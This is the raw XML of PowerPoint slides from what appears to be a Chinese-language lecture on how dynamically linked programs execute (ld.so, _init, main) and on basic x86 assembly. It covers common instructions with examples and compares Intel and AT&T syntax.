        <p:nvSpPr>
          <p:cNvPr id="709" name="Shape 709"/>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kernel mode</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="705" name="Shape 705"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6847100" y="37884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ld.so</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="710" name="Shape 710"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="705" idx="0"/>
            <a:endCxn id="696" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7624700" y="3416451"/>
            <a:ext cx="0" cy="372000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="711" name="Shape 711"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9534533" y="2276584"/>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_init</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="712" name="Shape 712"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9534533"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main()</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="713" name="Shape 713"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="697" idx="3"/>
            <a:endCxn id="711" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763900" y="2468600"/>
            <a:ext cx="770800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="714" name="Shape 714"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="711" idx="2"/>
            <a:endCxn id="712" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10312133" y="2660584"/>
            <a:ext cx="0" cy="372000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Shape 662">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB32ED1E-3C57-4B5E-97AE-4231E2EF61B6}"/>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动态链接的程序的执行过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="矩形 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D424BE05-ACFA-4158-AA0C-C4C925F5083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61A895-2852-4CA9-A4DE-8C067FC01831}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3110927" y="2131456"/>
            <a:ext cx="2195167"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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MOV</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LEA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ADD/SUB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PUSH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>POP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CMP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F7EA0A7-AB29-4680-B29C-251A83AE3EA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5915694" y="2131456"/>
            <a:ext cx="3700529" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>JMP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>J[Condition]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CALL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LEAVE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>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
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF3C4A32-06B5-4AE4-A53E-0FB0E835CF2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4455335" y="1566760"/>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常用汇编指令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AE051B2-9F31-4490-B210-EBDC06E2317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51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233014"/>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MOV</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1898881"/>
            <a:ext cx="54714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MOV DEST,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把源操作数传送给目标</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87738"/>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EAX,1234H 	 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>执行结果（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">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 1234H</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EBX, EAX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[00404011H]  ; [ ] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>表示取地址内的值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[ESI]  </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20371"/>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A408D3B-C1BB-4C09-8F7D-0A710C940A61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547764" y="4486238"/>
            <a:ext cx="72596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LEA REG,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把源操作数的有效地址送给指定的寄存器</a:t>
            </a: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975095"/>
            <a:ext cx="8437915"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LEA EBX, ASC                    ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>取 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ASC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的地址存放至 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>EBX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>寄存器中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>LEA EAX, 6[ESI]                 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>把 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ESI+6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单元的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>位地址送给 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>EAX </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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C6C88363-74F3-42BB-8402-DCBBC1B8ABD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20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65377"/>
            <a:ext cx="108876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PUSH</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2331244"/>
            <a:ext cx="660950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PUSH VALUE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把目标值压栈，同时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820101"/>
            <a:ext cx="6132448"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1234H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EAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1681B94-EB9A-4FB3-8663-6CA3B3DCD2EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2116397" y="3748043"/>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POP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0BD8F46-DB95-4FD0-BBAE-06FD8169FA53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547765" y="4413910"/>
            <a:ext cx="829265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POP DEST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将栈顶的值弹出至目的存储位置，同时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10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{080C8EF2-285D-485B-9AFC-F30F7DC74E5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547765" y="4902767"/>
            <a:ext cx="61324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EAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B521834-EBC8-43B7-B1AA-30A369D345A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357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24900"/>
            <a:ext cx="1314784"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LEAVE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">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29686"/>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在函数返回时，恢复父函数栈帧的指令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ESP, EBP</a:t>
            </a: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EBP</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05856"/>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RET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRP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423550"/>
            <a:ext cx="8437915"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在函数返回时，控制程序执行流返回父函数的指令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RIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（这条指令实际是不存在的，不能直接向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>RIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>寄存器传送数据）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1598CFC-3167-47A4-B6B0-854F5871AB04}"/>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52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hape 228">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{042C1C45-6B35-42E3-85B6-55A4A324188F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="858910591"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3162350" y="1753782"/>
          <a:ext cx="5867300" cy="2336970"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2933650">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2933650">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="338300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                        <a:t>i</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" dirty="0"/>
                        <a:t>ntel</a:t>
                      </a:r>
                      <a:endParaRPr dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" dirty="0"/>
                        <a:t>AT&amp;T</a:t>
                      </a:r>
                      <a:endParaRPr dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="338300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" dirty="0">
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t>mov eax, 8</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$8,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38300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t>mov ebx, 0ffffh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movl $0xffff, %ebx</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38300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t>int 80h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int $80</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38300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" dirty="0">
                          <a:latin typeface="Consolas"/>
                          <a:ea typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                          <a:sym typeface="Consolas"/>
                        </a:rPr>
                        <a:t>mov eax, [ecx]</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(%ecx),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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 229">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E09946BD-1CBB-4464-8F95-4AD615F49DB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3142289" y="4360463"/>
            <a:ext cx="2954557"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eax, [ebp+12]</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 eax, [ebp+8]</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 ebp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retn</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 230">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{521B6488-A68F-4405-8F87-1138DEBF34D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096846" y="4360463"/>
            <a:ext cx="2932804"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%esp,%ebp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12(%ebp),%eax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addl 8(%ebp),%eax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endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
